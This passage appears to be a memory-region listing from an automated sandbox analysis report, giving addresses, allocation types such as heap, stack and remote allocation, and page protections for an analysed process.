page read and write
|
||
|
313117E000
|
stack
|
page read and write
|
||
|
72DB000
|
stack
|
page read and write
|
||
|
C90000
|
direct allocation
|
page read and write
|
||
|
1FB2F95F000
|
heap
|
page read and write
|
||
|
1A2C9400000
|
trusted library allocation
|
page read and write
|
||
|
1FB2F952000
|
heap
|
page read and write
|
||
|
1C1F46BD000
|
heap
|
page read and write
|
||
|
1A2E30CA000
|
heap
|
page read and write
|
||
|
2BBD000
|
stack
|
page read and write
|
||
|
1C1F2934000
|
heap
|
page read and write
|
||
|
1A2C9435000
|
heap
|
page read and write
|
||
|
1C1F2670000
|
heap
|
page read and write
|
||
|
1FB2F975000
|
heap
|
page read and write
|
||
|
313153E000
|
stack
|
page read and write
|
||
|
78D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
841E000
|
stack
|
page read and write
|
||
|
3131339000
|
stack
|
page read and write
|
||
|
22FE0000
|
remote allocation
|
page read and write
|
||
|
3180000
|
trusted library allocation
|
page read and write
|
||
|
231EF000
|
stack
|
page read and write
|
||
|
4B70000
|
remote allocation
|
page execute and read and write
|
||
|
1FB2F8E0000
|
heap
|
page read and write
|
||
|
4A38000
|
trusted library allocation
|
page read and write
|
||
|
1FB2F7EB000
|
heap
|
page read and write
|
||
|
E2393FF000
|
stack
|
page read and write
|
||
|
1A2E32D9000
|
heap
|
page read and write
|
||
|
1FB2F976000
|
heap
|
page read and write
|
||
|
1FB2F977000
|
heap
|
page read and write
|
||
|
1FB2D95C000
|
heap
|
page read and write
|
||
|
1FB2D92C000
|
heap
|
page read and write
|
||
|
7FF849080000
|
trusted library allocation
|
page read and write
|
||
|
1C1F2896000
|
heap
|
page read and write
|
||
|
1FB2D95C000
|
heap
|
page read and write
|
||
|
1FB2F7E1000
|
heap
|
page read and write
|
||
|
1A2C90ED000
|
heap
|
page read and write
|
||
|
23300000
|
heap
|
page read and write
|
||
|
1FB2F7E1000
|
heap
|
page read and write
|
||
|
1A2DB01A000
|
trusted library allocation
|
page read and write
|
||
|
1FB2F8E1000
|
heap
|
page read and write
|
||
|
1A2CAB95000
|
heap
|
page read and write
|
||
|
1FB2F95F000
|
heap
|
page read and write
|
||
|
7FF849010000
|
trusted library allocation
|
page read and write
|
||
|
83B0000
|
trusted library allocation
|
page read and write
|
||
|
70D0000
|
direct allocation
|
page read and write
|
||
|
7FF848FB0000
|
trusted library allocation
|
page read and write
|
||
|
1C1F292C000
|
heap
|
page read and write
|
||
|
7FF848D60000
|
trusted library allocation
|
page read and write
|
||
|
1C1F2770000
|
heap
|
page read and write
|
||
|
1A2CABAC000
|
heap
|
page read and write
|
||
|
1C1F2872000
|
heap
|
page read and write
|
||
|
30D9000
|
heap
|
page read and write
|
||
|
1C1F293F000
|
heap
|
page read and write
|
||
|
3160000
|
trusted library section
|
page read and write
|
||
|
1C1F2959000
|
heap
|
page read and write
|
||
|
1C1F287B000
|
heap
|
page read and write
|
||
|
3130EFE000
|
stack
|
page read and write
|
||
|
1FB2F983000
|
heap
|
page read and write
|
||
|
1C1F2949000
|
heap
|
page read and write
|
||
|
1C1F2889000
|
heap
|
page read and write
|
||
|
1FB2F950000
|
heap
|
page read and write
|
||
|
89F0000
|
trusted library allocation
|
page read and write
|
||
|
1FB2D946000
|
heap
|
page read and write
|
||
|
2326F000
|
stack
|
page read and write
|
||
|
1A2CAA50000
|
trusted library allocation
|
page read and write
|
||
|
1C1F2894000
|
heap
|
page read and write
|
||
|
3130FFC000
|
stack
|
page read and write
|
||
|
1FB2FABA000
|
heap
|
page read and write
|
||
|
7120000
|
direct allocation
|
page read and write
|
||
|
6E0000
|
heap
|
page readonly
|
||
|
8490000
|
trusted library allocation
|
page read and write
|
||
|
1FB2F94F000
|
heap
|
page read and write
|
||
|
1A2C9197000
|
heap
|
page read and write
|
||
|
1A2E32F9000
|
heap
|
page read and write
|
||
|
2FD4EFE000
|
stack
|
page read and write
|
||
|
1FB2D924000
|
heap
|
page read and write
|
||
|
231AB000
|
stack
|
page read and write
|
||
|
1C1F288F000
|
heap
|
page read and write
|
||
|
845F000
|
stack
|
page read and write
|
||
|
1FB2D94F000
|
heap
|
page read and write
|
||
|
1C1F46B2000
|
heap
|
page read and write
|
||
|
1FB2D957000
|
heap
|
page read and write
|
||
|
1FB2F800000
|
heap
|
page read and write
|
||
|
1FB2D991000
|
heap
|
page read and write
|
||
|
1C1F293F000
|
heap
|
page read and write
|
||
|
75A8000
|
trusted library allocation
|
page read and write
|
||
|
78B000
|
heap
|
page read and write
|
||
|
1FB2F8F2000
|
heap
|
page read and write
|
||
|
2322D000
|
stack
|
page read and write
|
||
|
1FB2D960000
|
heap
|
page read and write
|
||
|
73E0000
|
heap
|
page read and write
|
||
|
1A2E3074000
|
heap
|
page read and write
|
||
|
75A0000
|
trusted library allocation
|
page read and write
|
||
|
1C1F2A2E000
|
heap
|
page read and write
|
||
|
67F000
|
stack
|
page read and write
|
||
|
1C1F2895000
|
heap
|
page read and write
|
||
|
3F90000
|
remote allocation
|
page execute and read and write
|
||
|
1A2C9080000
|
trusted library allocation
|
page read and write
|
||
|
1FB2F9A9000
|
heap
|
page read and write
|
||
|
7FF849000000
|
trusted library allocation
|
page read and write
|
||
|
1C1F2955000
|
heap
|
page read and write
|
||
|
1FB2F909000
|
heap
|
page read and write
|
||
|
87B5000
|
heap
|
page read and write
|
||
|
2B7C000
|
stack
|
page read and write
|
||
|
1FB2F984000
|
heap
|
page read and write
|
||
|
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
|
1FB2DAF0000
|
heap
|
page read and write
|
||
|
1C1F2892000
|
heap
|
page read and write
|
||
|
3240000
|
heap
|
page read and write
|
||
|
2E7E000
|
stack
|
page read and write
|
||
|
7FF848D62000
|
trusted library allocation
|
page read and write
|
||
|
1FB2F95F000
|
heap
|
page read and write
|
||
|
7FF848F20000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A2E316E000
|
heap
|
page read and write
|
||
|
1C1F287D000
|
heap
|
page read and write
|
||
|
1FB2F914000
|
heap
|
page read and write
|
||
|
1FB2D925000
|
heap
|
page read and write
|
||
|
1C1F294C000
|
heap
|
page read and write
|
||
|
1A2CB1C6000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FC0000
|
trusted library allocation
|
page read and write
|
||
|
1C1F294D000
|
heap
|
page read and write
|
||
|
7FF849040000
|
trusted library allocation
|
page read and write
|
||
|
1A2C90E2000
|
heap
|
page read and write
|
||
|
1C1F2920000
|
heap
|
page read and write
|
||
|
1A2C9103000
|
heap
|
page read and write
|
||
|
1C1F2A20000
|
heap
|
page read and write
|
||
|
1FB2F9A9000
|
heap
|
page read and write
|
||
|
31314BE000
|
stack
|
page read and write
|
||
|
7FF848D6D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF849050000
|
trusted library allocation
|
page read and write
|
||
|
729D000
|
stack
|
page read and write
|
||
|
1C1F287B000
|
heap
|
page read and write
|
||
|
1C1F2872000
|
heap
|
page read and write
|
||
|
1FB2F7E1000
|
heap
|
page read and write
|
||
|
1FB2F953000
|
heap
|
page read and write
|
||
|
1C1F2934000
|
heap
|
page read and write
|
||
|
3104000
|
heap
|
page read and write
|
||
|
1FB2F933000
|
heap
|
page read and write
|
||
|
1FB2F800000
|
heap
|
page read and write
|
||
|
1C1F2A27000
|
heap
|
page read and write
|
||
|
313208D000
|
stack
|
page read and write
|
||
|
7960000
|
trusted library allocation
|
page read and write
|
||
|
1A2C8FE0000
|
heap
|
page read and write
|
||
|
1A2E3550000
|
heap
|
page read and write
|
||
|
7920000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FE0000
|
trusted library allocation
|
page read and write
|
||
|
1FB2F937000
|
heap
|
page read and write
|
||
|
1C1F2A2A000
|
heap
|
page read and write
|
||
|
30D4000
|
heap
|
page read and write
|
||
|
8480000
|
trusted library allocation
|
page read and write
|
||
|
1FB2F963000
|
heap
|
page read and write
|
||
|
313163C000
|
stack
|
page read and write
|
||
|
1FB2FA83000
|
heap
|
page read and write
|
||
|
1C1F294A000
|
heap
|
page read and write
|
||
|
304B000
|
heap
|
page read and write
|
||
|
87CC000
|
heap
|
page read and write
|
||
|
1C1F293F000
|
heap
|
page read and write
|
||
|
787E000
|
stack
|
page read and write
|
||
|
93E000
|
stack
|
page read and write
|
||
|
1C1F2952000
|
heap
|
page read and write
|
||
|
CD0000
|
direct allocation
|
page read and write
|
||
|
4BA8000
|
heap
|
page read and write
|
||
|
1FB2FA31000
|
heap
|
page read and write
|
||
|
75D5000
|
heap
|
page read and write
|
||
|
1FB2D958000
|
heap
|
page read and write
|
||
|
22EEF000
|
stack
|
page read and write
|
||
|
3130F7E000
|
stack
|
page read and write
|
||
|
1FB2F905000
|
heap
|
page read and write
|
||
|
3183000
|
trusted library allocation
|
page execute and read and write
|
||
|
8A4E000
|
stack
|
page read and write
|
||
|
1FB2F9F1000
|
heap
|
page read and write
|
||
|
1C1F2872000
|
heap
|
page read and write
|
||
|
1C1F2872000
|
heap
|
page read and write
|
||
|
3170000
|
trusted library allocation
|
page read and write
|
||
|
5D56000
|
trusted library allocation
|
page read and write
|
||
|
1C1F46B0000
|
heap
|
page read and write
|
||
|
1FB2F9A9000
|
heap
|
page read and write
|
||
|
75DC000
|
heap
|
page read and write
|
||
|
7FF848D63000
|
trusted library allocation
|
page execute and read and write
|
||
|
31312B6000
|
stack
|
page read and write
|
||
|
1FB2F914000
|
heap
|
page read and write
|
||
|
1C1F2896000
|
heap
|
page read and write
|
||
|
3071000
|
heap
|
page read and write
|
||
|
1A2CB1C2000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
|
1FB2F95F000
|
heap
|
page read and write
|
||
|
1FB2D958000
|
heap
|
page read and write
|
||
|
7FF848F45000
|
trusted library allocation
|
page read and write
|
||
|
1A2CC98C000
|
trusted library allocation
|
page read and write
|
||
|
1FB2F94E000
|
heap
|
page read and write
|
||
|
1C1F292F000
|
heap
|
page read and write
|
||
|
4B5E000
|
stack
|
page read and write
|
||
|
1FB2F963000
|
heap
|
page read and write
|
||
|
1FB2F94D000
|
heap
|
page read and write
|
||
|
1FB2D958000
|
heap
|
page read and write
|
||
|
1FB2D937000
|
heap
|
page read and write
|
||
|
1C1F2A85000
|
heap
|
page read and write
|
||
|
7950000
|
trusted library allocation
|
page read and write
|
||
|
1FB2F9E6000
|
heap
|
page read and write
|
||
|
1C1F2A2A000
|
heap
|
page read and write
|
||
|
7EF80000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FB2F9C5000
|
heap
|
page read and write
|
||
|
313143E000
|
stack
|
page read and write
|
||
|
1FB2F963000
|
heap
|
page read and write
|
||
|
1A2C9131000
|
heap
|
page read and write
|
||
|
1C1F2A2B000
|
heap
|
page read and write
|
||
|
1FB2F9A6000
|
heap
|
page read and write
|
||
|
1A2E32B0000
|
heap
|
page read and write
|
||
|
7370000
|
remote allocation
|
page execute and read and write
|
||
|
4B10000
|
heap
|
page read and write
|
||
|
97F000
|
stack
|
page read and write
|
||
|
4A8C000
|
stack
|
page read and write
|
||
|
2FD4FFF000
|
stack
|
page read and write
|
||
|
1FB2F983000
|
heap
|
page read and write
|
||
|
1FB2F9B5000
|
heap
|
page read and write
|
||
|
1FB2F963000
|
heap
|
page read and write
|
||
|
2FEE000
|
stack
|
page read and write
|
||
|
313200E000
|
stack
|
page read and write
|
||
|
1C1F2888000
|
heap
|
page read and write
|
||
|
5570000
|
remote allocation
|
page execute and read and write
|
||
|
2FD4E7F000
|
stack
|
page read and write
|
||
|
1C1F2891000
|
heap
|
page read and write
|
||
|
1FB2F975000
|
heap
|
page read and write
|
||
|
8615000
|
trusted library allocation
|
page read and write
|
||
|
1C1F2927000
|
heap
|
page read and write
|
||
|
4AD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FB2D991000
|
heap
|
page read and write
|
||
|
6FB5000
|
heap
|
page execute and read and write
|
||
|
A20000
|
direct allocation
|
page read and write
|
||
|
898D000
|
stack
|
page read and write
|
||
|
6D0000
|
heap
|
page read and write
|
||
|
1FB2F973000
|
heap
|
page read and write
|
||
|
7FF848F1A000
|
trusted library allocation
|
page read and write
|
||
|
3130BCE000
|
stack
|
page read and write
|
||
|
1C1F28A9000
|
heap
|
page read and write
|
||
|
1FB2F933000
|
heap
|
page read and write
|
||
|
1FB2D92C000
|
heap
|
page read and write
|
||
|
1C1F2A25000
|
heap
|
page read and write
|
||
|
1C1F2932000
|
heap
|
page read and write
|
||
|
1FB2F9E1000
|
heap
|
page read and write
|
||
|
7FF849030000
|
trusted library allocation
|
page read and write
|
||
|
31315BE000
|
stack
|
page read and write
|
||
|
7590000
|
heap
|
page execute and read and write
|
||
|
5F70000
|
remote allocation
|
page execute and read and write
|
||
|
1FB2D924000
|
heap
|
page read and write
|
||
|
1C1F28AF000
|
heap
|
page read and write
|
||
|
1FB2F7F4000
|
heap
|
page read and write
|
||
|
1FB2F813000
|
heap
|
page read and write
|
||
|
1C1F2949000
|
heap
|
page read and write
|
||
|
1A2CAAD0000
|
heap
|
page execute and read and write
|
||
|
4BA0000
|
heap
|
page read and write
|
||
|
1FB2F953000
|
heap
|
page read and write
|
||
|
313210A000
|
stack
|
page read and write
|
||
|
751E000
|
stack
|
page read and write
|
||
|
8377000
|
stack
|
page read and write
|
||
|
7930000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E1C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C1F2889000
|
heap
|
page read and write
|
||
|
CA0000
|
direct allocation
|
page read and write
|
||
|
1C1F2949000
|
heap
|
page read and write
|
||
|
1C1F28BF000
|
heap
|
page read and write
|
||
|
1FB2F977000
|
heap
|
page read and write
|
||
|
1FB2FABA000
|
heap
|
page read and write
|
||
|
1FB2DAF8000
|
heap
|
page read and write
|
||
|
A10000
|
direct allocation
|
page read and write
|
||
|
E2396FB000
|
stack
|
page read and write
|
||
|
1FB2F9B5000
|
heap
|
page read and write
|
||
|
A50000
|
direct allocation
|
page read and write
|
||
|
E2390FE000
|
stack
|
page read and write
|
||
|
A30000
|
direct allocation
|
page read and write
|
||
|
7C6000
|
heap
|
page read and write
|
||
|
1FB2D8D0000
|
heap
|
page read and write
|
||
|
7FF848E20000
|
trusted library allocation
|
page execute and read and write
|
||
|
71D0000
|
direct allocation
|
page read and write
|
||
|
89E0000
|
trusted library allocation
|
page read and write
|
||
|
84EE000
|
trusted library allocation
|
page read and write
|
||
|
3199000
|
trusted library allocation
|
page read and write
|
||
|
1FB2FA5E000
|
heap
|
page read and write
|
||
|
1A2C9420000
|
heap
|
page execute and read and write
|
||
|
1C1F2953000
|
heap
|
page read and write
|
||
|
2FD4F7F000
|
stack
|
page read and write
|
||
|
7910000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
|
7140000
|
direct allocation
|
page read and write
|
||
|
75E5000
|
heap
|
page read and write
|
||
|
1FB2D8D5000
|
heap
|
page read and write
|
||
|
1C1F46C4000
|
heap
|
page read and write
|
||
|
1FB2FA30000
|
heap
|
page read and write
|
||
|
1FB2F800000
|
heap
|
page read and write
|
||
|
2301E000
|
stack
|
page read and write
|
||
|
8A00000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A2C8FD0000
|
heap
|
page read and write
|
||
|
1FB2F800000
|
heap
|
page read and write
|
||
|
2BB7000
|
stack
|
page read and write
|
||
|
3190000
|
trusted library allocation
|
page read and write
|
||
|
1FB2F953000
|
heap
|
page read and write
|
||
|
8A90000
|
trusted library allocation
|
page read and write
|
||
|
1FB2D937000
|
heap
|
page read and write
|
||
|
1FB2F420000
|
remote allocation
|
page read and write
|
||
|
7629000
|
heap
|
page read and write
|
||
|
22E3C000
|
stack
|
page read and write
|
||
|
1A2CAF55000
|
trusted library allocation
|
page read and write
|
||
|
1FB2F800000
|
heap
|
page read and write
|
||
|
1FB2F903000
|
heap
|
page read and write
|
||
|
1FB2D92C000
|
heap
|
page read and write
|
||
|
1C1F28AE000
|
heap
|
page read and write
|
||
|
7FF849070000
|
trusted library allocation
|
page read and write
|
||
|
1A2E30A0000
|
heap
|
page read and write
|
||
|
1FB2F951000
|
heap
|
page read and write
|
||
|
1FB2F933000
|
heap
|
page read and write
|
||
|
8750000
|
heap
|
page read and write
|
||
|
1C1F2832000
|
heap
|
page read and write
|
||
|
1FB2FA05000
|
heap
|
page read and write
|
||
|
1FB2F420000
|
remote allocation
|
page read and write
|
||
|
1FB2F9B5000
|
heap
|
page read and write
|
||
|
1FB2D967000
|
heap
|
page read and write
|
||
|
1C1F292C000
|
heap
|
page read and write
|
||
|
8A8C000
|
stack
|
page read and write
|
||
|
4A2E000
|
stack
|
page read and write
|
||
|
A40000
|
direct allocation
|
page read and write
|
||
|
1A2C9427000
|
heap
|
page execute and read and write
|
||
|
1FB2FA30000
|
heap
|
page read and write
|
||
|
1C1F289B000
|
heap
|
page read and write
|
||
|
1FB2F9E1000
|
heap
|
page read and write
|
||
|
1FB2F963000
|
heap
|
page read and write
|
||
|
1FB2F7FF000
|
heap
|
page read and write
|
||
|
84A0000
|
trusted library allocation
|
page read and write
|
||
|
1FB2F7E8000
|
heap
|
page read and write
|
||
|
1C1F27C0000
|
heap
|
page read and write
|
||
|
1C1F288E000
|
heap
|
page read and write
|
||
|
7990000
|
trusted library allocation
|
page read and write
|
||
|
3130E7F000
|
stack
|
page read and write
|
||
|
1A2C90A0000
|
heap
|
page read and write
|
||
|
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
|
1FB2F8E1000
|
heap
|
page read and write
|
||
|
1C1F2790000
|
trusted library allocation
|
page read and write
|
||
|
31D0000
|
trusted library allocation
|
page read and write
|
||
|
7900000
|
trusted library allocation
|
page read and write
|
||
|
70CB000
|
stack
|
page read and write
|
||
|
1A2E3070000
|
heap
|
page read and write
|
||
|
5BB1000
|
trusted library allocation
|
page read and write
|
||
|
8788000
|
heap
|
page read and write
|
||
|
1FB2F9E0000
|
heap
|
page read and write
|
||
|
1FB2F94E000
|
heap
|
page read and write
|
||
|
7FF848F80000
|
trusted library allocation
|
page read and write
|
||
|
1FB2F9B6000
|
heap
|
page read and write
|
||
|
CE0000
|
direct allocation
|
page read and write
|
||
|
1A2CAAC0000
|
trusted library allocation
|
page read and write
|
||
|
1A2DAD31000
|
trusted library allocation
|
page read and write
|
||
|
1A2E3325000
|
heap
|
page read and write
|
||
|
CB0000
|
direct allocation
|
page read and write
|
||
|
78E000
|
heap
|
page read and write
|
||
|
708D000
|
stack
|
page read and write
|
||
|
E2399FB000
|
stack
|
page read and write
|
||
|
1A2CC990000
|
trusted library allocation
|
page read and write
|
||
|
1C1F28B3000
|
heap
|
page read and write
|
||
|
9D20000
|
direct allocation
|
page execute and read and write
|
||
|
321E000
|
stack
|
page read and write
|
||
|
31AA000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FB2F7E4000
|
heap
|
page read and write
|
||
|
1C1F46C6000
|
heap
|
page read and write
|
||
|
8784000
|
heap
|
page read and write
|
||
|
7210000
|
direct allocation
|
page read and write
|
||
|
783E000
|
stack
|
page read and write
|
||
|
1C1F4830000
|
heap
|
page read and write
|
||
|
1A2E3166000
|
heap
|
page read and write
|
||
|
7FF849020000
|
trusted library allocation
|
page read and write
|
||
|
1A2CB45F000
|
trusted library allocation
|
page read and write
|
||
|
1A2CC97E000
|
trusted library allocation
|
page read and write
|
||
|
89D0000
|
trusted library allocation
|
page read and write
|
||
|
1A2C9000000
|
heap
|
page read and write
|
||
|
1FB2D907000
|
heap
|
page read and write
|
||
|
1FB2F7E1000
|
heap
|
page read and write
|
||
|
875C000
|
heap
|
page read and write
|
||
|
1C1F2884000
|
heap
|
page read and write
|
||
|
79EB000
|
stack
|
page read and write
|
||
|
1C1F2856000
|
heap
|
page read and write
|
||
|
1FB2D924000
|
heap
|
page read and write
|
||
|
77FE000
|
stack
|
page read and write
|
||
|
1A2CB16B000
|
trusted library allocation
|
page read and write
|
||
|
22FE0000
|
remote allocation
|
page read and write
|
||
|
7DF450260000
|
trusted library allocation
|
page execute and read and write
|
||
|
C80000
|
direct allocation
|
page read and write
|
||
|
1A2CB8BD000
|
trusted library allocation
|
page read and write
|
||
|
1C1F293F000
|
heap
|
page read and write
|
||
|
E2398FF000
|
stack
|
page read and write
|
||
|
1A2CC96C000
|
trusted library allocation
|
page read and write
|
||
|
302E000
|
stack
|
page read and write
|
||
|
2EBF000
|
stack
|
page read and write
|
||
|
1A2C9040000
|
heap
|
page read and write
|
||
|
1A2CB1AA000
|
trusted library allocation
|
page read and write
|
||
|
1FB2F963000
|
heap
|
page read and write
|
||
|
1FB2F908000
|
heap
|
page read and write
|
||
|
1A2E30C8000
|
heap
|
page read and write
|
||
|
1FB2F973000
|
heap
|
page read and write
|
||
|
1C1F2790000
|
trusted library allocation
|
page read and write
|
||
|
22F7F000
|
stack
|
page read and write
|
||
|
776000
|
heap
|
page read and write
|
||
|
307E000
|
heap
|
page read and write
|
||
|
CC0000
|
direct allocation
|
page read and write
|
||
|
1FB2F933000
|
heap
|
page read and write
|
||
|
1C1F2938000
|
heap
|
page read and write
|
||
|
1A2CC968000
|
trusted library allocation
|
page read and write
|
||
|
9320000
|
direct allocation
|
page execute and read and write
|
||
|
8770000
|
heap
|
page read and write
|
||
|
4170000
|
remote allocation
|
page execute and read and write
|
||
|
1C1F2837000
|
heap
|
page read and write
|
||
|
2ED0000
|
heap
|
page read and write
|
||
|
1FB2F937000
|
heap
|
page read and write
|
||
|
1C1F2884000
|
heap
|
page read and write
|
||
|
7FF848F70000
|
trusted library allocation
|
page read and write
|
||
|
1A2C912D000
|
heap
|
page read and write
|
||
|
1A2CC235000
|
trusted library allocation
|
page read and write
|
||
|
7FF849090000
|
trusted library allocation
|
page read and write
|
||
|
73DE000
|
stack
|
page read and write
|
||
|
22FE0000
|
remote allocation
|
page read and write
|
||
|
1A2C90E7000
|
heap
|
page read and write
|
||
|
1FB2D968000
|
heap
|
page read and write
|
||
|
1FB2D8D0000
|
heap
|
page read and write
|
||
|
313218B000
|
stack
|
page read and write
|
||
|
1C1F2A2A000
|
heap
|
page read and write
|
||
|
1FB2D95C000
|
heap
|
page read and write
|
||
|
1A2C912B000
|
heap
|
page read and write
|
||
|
1A2CAD31000
|
trusted library allocation
|
page read and write
|
||
|
2FD4BEF000
|
stack
|
page read and write
|
||
|
1FB2F907000
|
heap
|
page read and write
|
||
|
22CFE000
|
stack
|
page read and write
|
||
|
E238D29000
|
stack
|
page read and write
|
||
|
3107000
|
heap
|
page read and write
|
||
|
3150000
|
trusted library section
|
page read and write
|
||
|
8B30000
|
trusted library allocation
|
page execute and read and write
|
||
|
76D2000
|
heap
|
page read and write
|
||
|
5C17000
|
trusted library allocation
|
page read and write
|
||
|
1FB2F9A6000
|
heap
|
page read and write
|
||
|
63C000
|
stack
|
page read and write
|
||
|
1FB2F813000
|
heap
|
page read and write
|
||
|
1FB2F95F000
|
heap
|
page read and write
|
||
|
1C1F2895000
|
heap
|
page read and write
|
||
|
1C1F289A000
|
heap
|
page read and write
|
||
|
1FB2D8D5000
|
heap
|
page read and write
|
||
|
C520000
|
direct allocation
|
page execute and read and write
|
||
|
1C1F2A23000
|
heap
|
page read and write
|
||
|
1A2CB89B000
|
trusted library allocation
|
page read and write
|
||
|
86B0000
|
heap
|
page read and write
|
||
|
79A0000
|
trusted library allocation
|
page read and write
|
||
|
7940000
|
trusted library allocation
|
page read and write
|
||
|
78E0000
|
trusted library allocation
|
page read and write
|
||
|
1FB2D92C000
|
heap
|
page read and write
|
||
|
1C1F294B000
|
heap
|
page read and write
|
||
|
75F5000
|
heap
|
page read and write
|
||
|
1C1F2929000
|
heap
|
page read and write
|
||
|
7FF848F47000
|
trusted library allocation
|
page read and write
|
||
|
1FB2D924000
|
heap
|
page read and write
|
||
|
2ED4000
|
heap
|
page read and write
|
||
|
7FF848FF0000
|
trusted library allocation
|
page read and write
|
||
|
6FAE000
|
stack
|
page read and write
|
||
|
6F0000
|
heap
|
page read and write
|
||
|
1C1F2892000
|
heap
|
page read and write
|
||
|
1A2E3155000
|
heap
|
page read and write
|
||
|
1C1F287F000
|
heap
|
page read and write
|
||
|
1FB2F963000
|
heap
|
page read and write
|
||
|
1FB2F95F000
|
heap
|
page read and write
|
||
|
1A2CAA80000
|
trusted library allocation
|
page read and write
|
||
|
1FB2F7E0000
|
heap
|
page read and write
|
||
|
7FF848D70000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E80000
|
trusted library allocation
|
page execute and read and write
|
||
|
718D000
|
stack
|
page read and write
|
||
|
1FB2FAB9000
|
heap
|
page read and write
|
||
|
1FB2D8CB000
|
heap
|
page read and write
|
||
|
1FB2F937000
|
heap
|
page read and write
|
||
|
C70000
|
direct allocation
|
page read and write
|
||
|
1A2E3370000
|
heap
|
page read and write
|
||
|
1FB2D95C000
|
heap
|
page read and write
|
||
|
1FB2F94D000
|
heap
|
page read and write
|
||
|
1FB2D8CF000
|
heap
|
page read and write
|
||
|
1FB2F937000
|
heap
|
page read and write
|
||
|
1FB2F963000
|
heap
|
page read and write
|
||
|
7FF848F42000
|
trusted library allocation
|
page read and write
|
||
|
1A2E32FE000
|
heap
|
page read and write
|
||
|
7130000
|
direct allocation
|
page read and write
|
||
|
1FB2D8D5000
|
heap
|
page read and write
|
||
|
71E0000
|
direct allocation
|
page read and write
|
||
|
1C1F2855000
|
heap
|
page read and write
|
||
|
1FB2D8E7000
|
heap
|
page read and write
|
||
|
31B5000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FB2F984000
|
heap
|
page read and write
|
||
|
1FB2DAF5000
|
heap
|
page read and write
|
||
|
7FF848D7B000
|
trusted library allocation
|
page read and write
|
||
|
1A2CB8AC000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D64000
|
trusted library allocation
|
page read and write
|
||
|
1C1F2854000
|
heap
|
page read and write
|
||
|
31B0000
|
trusted library allocation
|
page read and write
|
||
|
1C1F2949000
|
heap
|
page read and write
|
||
|
A60000
|
heap
|
page read and write
|
||
|
31313B8000
|
stack
|
page read and write
|
||
|
5D43000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
|
7100000
|
direct allocation
|
page read and write
|
||
|
1A2DAD51000
|
trusted library allocation
|
page read and write
|
||
|
71A000
|
heap
|
page read and write
|
||
|
1FB2F953000
|
heap
|
page read and write
|
||
|
1FB2D991000
|
heap
|
page read and write
|
||
|
3130B43000
|
stack
|
page read and write
|
||
|
1FB2D95C000
|
heap
|
page read and write
|
||
|
1C1F294B000
|
heap
|
page read and write
|
||
|
2312D000
|
stack
|
page read and write
|
||
|
7FF848F30000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FB2D924000
|
heap
|
page read and write
|
||
|
1A2C9430000
|
heap
|
page read and write
|
||
|
1FB2D8E7000
|
heap
|
page read and write
|
||
|
B120000
|
direct allocation
|
page execute and read and write
|
||
|
1A2CAD20000
|
heap
|
page read and write
|
||
|
1C1F288F000
|
heap
|
page read and write
|
||
|
23310000
|
heap
|
page read and write
|
||
|
1C1F2A27000
|
heap
|
page read and write
|
||
|
1FB2F490000
|
heap
|
page read and write
|
||
|
2E30000
|
heap
|
page read and write
|
||
|
3040000
|
heap
|
page read and write
|
||
|
6F6E000
|
stack
|
page read and write
|
||
|
7FF848FD0000
|
trusted library allocation
|
page read and write
|
||
|
2EC0000
|
heap
|
page read and write
|
||
|
1FB2D991000
|
heap
|
page read and write
|
||
|
1C1F2949000
|
heap
|
page read and write
|
||
|
1C1F2887000
|
heap
|
page read and write
|
||
|
1C1F2A80000
|
heap
|
page read and write
|
||
|
1C1F2750000
|
heap
|
page read and write
|
||
|
1FB2D958000
|
heap
|
page read and write
|
||
|
1FB2D9B0000
|
heap
|
page read and write
|
||
|
1C1F293F000
|
heap
|
page read and write
|
||
|
89CC000
|
stack
|
page read and write
|
||
|
7FF849060000
|
trusted library allocation
|
page read and write
|
||
|
1FB2F904000
|
heap
|
page read and write
|
||
|
1A2E311C000
|
heap
|
page read and write
|
||
|
7980000
|
trusted library allocation
|
page read and write
|
||
|
1FB2D92C000
|
heap
|
page read and write
|
There are 727 hidden memdumps, click here to show them.